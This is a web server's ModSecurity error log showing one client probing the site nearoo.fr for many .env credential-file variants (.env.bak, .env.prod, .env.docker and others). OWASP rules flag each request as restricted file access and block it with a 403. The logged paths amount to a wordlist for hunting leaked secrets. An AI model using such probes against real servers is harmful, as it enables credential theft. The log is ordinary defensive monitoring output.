[Mon May 11 16:54:10.988360 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.development"] [unique_id "agHtkoW8yzYoWG_eyCWhzAAAAVI"]
[Mon May 11 16:54:10.988583 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.development"] [unique_id "agHtkoW8yzYoWG_eyCWhzAAAAVI"]
[Mon May 11 16:54:11.142614 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.test"] [unique_id "agHtk4W8yzYoWG_eyCWhzgAAAVI"]
[Mon May 11 16:54:11.142824 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.test"] [unique_id "agHtk4W8yzYoWG_eyCWhzgAAAVI"]
[Mon May 11 16:54:11.143034 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.test"] [unique_id "agHtk4W8yzYoWG_eyCWhzgAAAVI"]
[Mon May 11 16:54:11.270729 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.remote"] [unique_id "agHtk4W8yzYoWG_eyCWh0AAAAVI"]
[Mon May 11 16:54:11.270918 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.remote"] [unique_id "agHtk4W8yzYoWG_eyCWh0AAAAVI"]
[Mon May 11 16:54:11.271134 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.remote"] [unique_id "agHtk4W8yzYoWG_eyCWh0AAAAVI"]
[Mon May 11 16:54:11.399740 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.bak"] [unique_id "agHtk4W8yzYoWG_eyCWh0QAAAVI"]
[Mon May 11 16:54:11.399953 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.bak"] [unique_id "agHtk4W8yzYoWG_eyCWh0QAAAVI"]
[Mon May 11 16:54:11.400193 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.bak"] [unique_id "agHtk4W8yzYoWG_eyCWh0QAAAVI"]
[Mon May 11 16:54:11.604545 2026] [authz_core:error] [pid 1411099:tid 1411120] [client 75.119.155.172:5126] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/PgSQL/error_log
[Mon May 11 16:54:11.606661 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.backup"] [unique_id "agHtk4W8yzYoWG_eyCWh0gAAAVI"]
[Mon May 11 16:54:11.606825 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.backup"] [unique_id "agHtk4W8yzYoWG_eyCWh0gAAAVI"]
[Mon May 11 16:54:11.607033 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.backup"] [unique_id "agHtk4W8yzYoWG_eyCWh0gAAAVI"]
[Mon May 11 16:54:11.763631 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.save"] [unique_id "agHtk4W8yzYoWG_eyCWh0wAAAVI"]
[Mon May 11 16:54:11.763849 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.save"] [unique_id "agHtk4W8yzYoWG_eyCWh0wAAAVI"]
[Mon May 11 16:54:11.764079 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.save"] [unique_id "agHtk4W8yzYoWG_eyCWh0wAAAVI"]
[Mon May 11 16:54:11.907864 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.old"] [unique_id "agHtk4W8yzYoWG_eyCWh1QAAAVI"]
[Mon May 11 16:54:11.908085 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.old"] [unique_id "agHtk4W8yzYoWG_eyCWh1QAAAVI"]
[Mon May 11 16:54:11.908352 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.old"] [unique_id "agHtk4W8yzYoWG_eyCWh1QAAAVI"]
[Mon May 11 16:54:12.073508 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.sample"] [unique_id "agHtlIW8yzYoWG_eyCWh1gAAAVI"]
[Mon May 11 16:54:12.073708 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.sample"] [unique_id "agHtlIW8yzYoWG_eyCWh1gAAAVI"]
[Mon May 11 16:54:12.073956 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.sample"] [unique_id "agHtlIW8yzYoWG_eyCWh1gAAAVI"]
[Mon May 11 16:54:12.227280 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.example"] [unique_id "agHtlIW8yzYoWG_eyCWh1wAAAVI"]
[Mon May 11 16:54:12.227503 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.example"] [unique_id "agHtlIW8yzYoWG_eyCWh1wAAAVI"]
[Mon May 11 16:54:12.227737 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.example"] [unique_id "agHtlIW8yzYoWG_eyCWh1wAAAVI"]
[Mon May 11 16:54:12.381326 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.dev"] [unique_id "agHtlIW8yzYoWG_eyCWh2QAAAVI"]
[Mon May 11 16:54:12.381545 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.dev"] [unique_id "agHtlIW8yzYoWG_eyCWh2QAAAVI"]
[Mon May 11 16:54:12.381787 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.dev"] [unique_id "agHtlIW8yzYoWG_eyCWh2QAAAVI"]
[Mon May 11 16:54:12.566237 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.prod"] [unique_id "agHtlIW8yzYoWG_eyCWh2wAAAVI"]
[Mon May 11 16:54:12.566410 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.prod"] [unique_id "agHtlIW8yzYoWG_eyCWh2wAAAVI"]
[Mon May 11 16:54:12.566632 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.prod"] [unique_id "agHtlIW8yzYoWG_eyCWh2wAAAVI"]
[Mon May 11 16:54:12.718312 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.stage"] [unique_id "agHtlIW8yzYoWG_eyCWh3AAAAVI"]
[Mon May 11 16:54:12.718533 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.stage"] [unique_id "agHtlIW8yzYoWG_eyCWh3AAAAVI"]
[Mon May 11 16:54:12.718777 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.stage"] [unique_id "agHtlIW8yzYoWG_eyCWh3AAAAVI"]
[Mon May 11 16:54:12.912258 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.ci"] [unique_id "agHtlIW8yzYoWG_eyCWh3gAAAVI"]
[Mon May 11 16:54:12.912458 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.ci"] [unique_id "agHtlIW8yzYoWG_eyCWh3gAAAVI"]
[Mon May 11 16:54:12.912675 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.ci"] [unique_id "agHtlIW8yzYoWG_eyCWh3gAAAVI"]
[Mon May 11 16:54:13.091034 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.docker"] [unique_id "agHtlYW8yzYoWG_eyCWh3wAAAVI"]
[Mon May 11 16:54:13.091283 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.docker"] [unique_id "agHtlYW8yzYoWG_eyCWh3wAAAVI"]
